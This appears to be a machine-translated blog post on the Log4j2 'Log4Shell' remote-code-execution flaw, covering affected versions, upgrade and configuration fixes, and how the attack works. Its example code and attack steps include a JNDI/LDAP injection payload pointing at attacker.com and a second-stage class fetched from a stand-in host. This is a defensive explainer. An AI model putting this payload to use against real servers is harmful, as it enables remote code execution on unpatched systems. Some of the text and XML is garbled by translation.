Too much influence! Even customers who don’t understand the code are asking about the 0day vulnerability in Log4j2

I woke up this morning and Apache Log4j2, the well-known Java logging component, exploded. It was found to have a 0 Day vulnerability, Log4J2, which allows a hacker to log Remote Code Execution. Because the log library is so widely used and the vulnerability is so easy to use, the risk is so serious that you have to take precautions. Even customers who didn’t understand the code came to ask if the system had this problem.

The affected version

The versions affected by the vulnerability range from Apache Log4j2 2.0 to 2.14.1.

Security version

The official patch version 2.15.0 has been released. Please upgrade it immediately.

<dependencies> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-api</artifactId> < version > 2.15.0 < / version > < / dependency > < the dependency > < groupId > org. Apache. Logging. Log4j < / groupId > The < artifactId > log4j - core < / artifactId > < version > 2.15.0 < / version > < / dependency > < / dependencies >Copy the code

Temporary remedy

Not all applications and users upgrade to secure versions in time. There are also temporary fixes.

• Modify JVM parameters, set-Dlog4j2.formatMsgNoLookups=true.
• Added under the classpath of the project involved in the vulnerabilitylog4j2.component.propertiesConfiguration file and add configuration itemslog4j2.formatMsgNoLookups=true.

Attack principle

 import org.apache.log4j.Logger;
 ​
 import java.io.*;
 import java.sql.SQLException;
 import java.util.*;
 ​
 public class VulnerableLog4jExampleHandler implements HttpHandler {
 ​
   static Logger log = Logger.getLogger(log4jExample.class.getName());
 ​
   /**
    * A simple HTTP endpoint that reads the request's User Agent and logs it back.
    * This is basically pseudo-code to explain the vulnerability, and not a full example.
    * @param he HTTP Request Object
    */
   public void handle(HttpExchange he) throws IOException {
     string userAgent = he.getRequestHeader("user-agent");
     
     // This line triggers the RCE by logging the attacker-controlled HTTP User Agent header.
     // The attacker can set their User-Agent header to: ${jndi:ldap://attacker.com/a}
     log.info("Request User Agent:" + userAgent);
 ​
     String response = "<h1>Hello There, " + userAgent + "!</h1>";
     he.sendResponseHeaders(200, response.length());
     OutputStream os = he.getResponseBody();
     os.write(response.getBytes());
     os.close();
   }
 }
Copy the code

Based on the attack code provided above, an attacker can inject some illegal executable code by executing the LDAP protocol through JNDI.

Attack steps

• The attacker initiates an attack request to the vulnerability server.
• Server passLog4j2Logs the base contained in the attack requestJNDIandLDAPMalicious load of${jndi:ldap://attacker.com/a}.attacker.comIs the address controlled by the attacker.
• The logged malicious load is triggered and the server passesJNDItoattacker.comThe request.
• attacker.comYou can add some malicious executable script to the response and inject it into the server process, such as executable bytecodehttp://second-stage.attacker.com/Exploit.class.
• The attacker executes malicious scripts.

Don’t take this loophole lightly

Because log4j is so widely used, many applications fall for it.

Even the PaperMC server for Minecraft was not spared. So go ahead and patch it.

Personal blog: felord.cn